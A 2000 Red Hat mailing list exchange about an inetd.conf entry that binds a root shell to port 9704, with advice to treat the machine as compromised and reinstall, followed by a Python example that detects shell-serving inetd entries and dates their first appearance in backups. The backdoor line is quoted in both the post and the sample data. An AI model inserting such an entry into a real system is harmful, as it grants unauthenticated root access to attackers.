On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
>
> Looking over a client's system I found the following
> line in inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i

EEK!

> telnet to the port and instant root access.

Yup.

> A quick look around didn't reveal any obvious
> problems. I'm worried about the non-obvious
> now.

Good man.

> any suggestions for things to do and places
> to poke into would be appreciated.

Well...

> (is it likely the system was compromised for
> future use?)

I'd say so, yes. And in that case all bets are off; they could have left
behind just about anything as a back door or other malicious stuff. The only
way you can really be sure they're gone (whoever "they" are) is to reinstall
from bare metal. :(

Don't really know what your setup is like or how long they've owned your box,
but hopefully you've kept good logs and backups of your system so that you can
have some idea of when the inetd.conf file was compromised (do old backup
versions of the file have that line as well? how far back?) and can then
cross-reference to that date in your old log files. But even then all you'd
get would be some indication of when and how they got in, and maybe some clues
about what they did once they got there. It's almost impossible to guarantee
that you've undone the damage unless you were running tripwire or some other
equivalent.

This is a pretty klutzy way of owning a system; whoever did this was either
(a) not real slick or (b) not at all concerned about being the only person
who could own your box. But that doesn't mean that they didn't hide their
tracks well elsewhere. Best bet is to take the machine down (at least off
the network), secure any vital data, wipe it, and start over. Sorry.
Cheers,
-m
--
Michael Jinks, IB
Systems Administrator, CCCP
finger [EMAIL PROTECTED] for public key
Vote Duke! http://www.entertaindom.com/pages/duke2000/home.jsp
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
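The check Michael describes (look for inetd.conf entries that hand a shell to whoever connects, then walk back through dated backups to see when the line first appeared) as an added example written for this thread, not code from either poster. The inetd.conf contents, backup dates and shell list are constructed for the example.

```python
"""Flag inetd.conf entries whose server program is a shell, and find the
earliest dated backup in which such an entry is present."""
import re

# Constructed sample data: a current inetd.conf plus dated backups (not real files).
CURRENT_INETD = """\
# inetd.conf
ftp    stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
9704 stream tcp nowait root /bin/sh sh -i
"""
BACKUPS = {  # date -> contents, constructed for the example
    "2000-08-01": "ftp    stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a\n",
    "2000-08-20": "ftp    stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a\n"
                  "9704 stream tcp nowait root /bin/sh sh -i\n",
    "2000-09-05": CURRENT_INETD,
}
SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh"}  # assumed list of shell names

def parse_inetd(text):
    """Yield one dict per active inetd.conf line. Field order is
    service socket_type proto wait user server [args...]; comments are dropped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed; inetd would not start this service either
        user = re.split(r"[.:]", fields[4])[0]  # 'user', 'user.group' or 'user:group'
        yield {"service": fields[0], "user": user, "server": fields[5],
               "args": fields[6:], "raw": line}

def suspicious(entry):
    """True when the server program, or the argv[0] it is given, is a shell."""
    prog = entry["server"].rsplit("/", 1)[-1]
    argv0 = entry["args"][0].rsplit("/", 1)[-1] if entry["args"] else ""
    return prog in SHELLS or argv0 in SHELLS

def find_shell_entries(text):
    """Return the raw lines of every suspicious entry in an inetd.conf text."""
    return [e["raw"] for e in parse_inetd(text) if suspicious(e)]

def first_seen(backups, bad_line):
    """Earliest backup date (ISO dates sort correctly as strings) with the line."""
    for date in sorted(backups):
        if bad_line in find_shell_entries(backups[date]):
            return date
    return None

if __name__ == "__main__":
    for bad in find_shell_entries(CURRENT_INETD):
        print(bad, "-> first present in backup dated", first_seen(BACKUPS, bad))
```

The date returned is where to start reading the old logs; an entry that is absent from every backup only tells you it is newer than the last one.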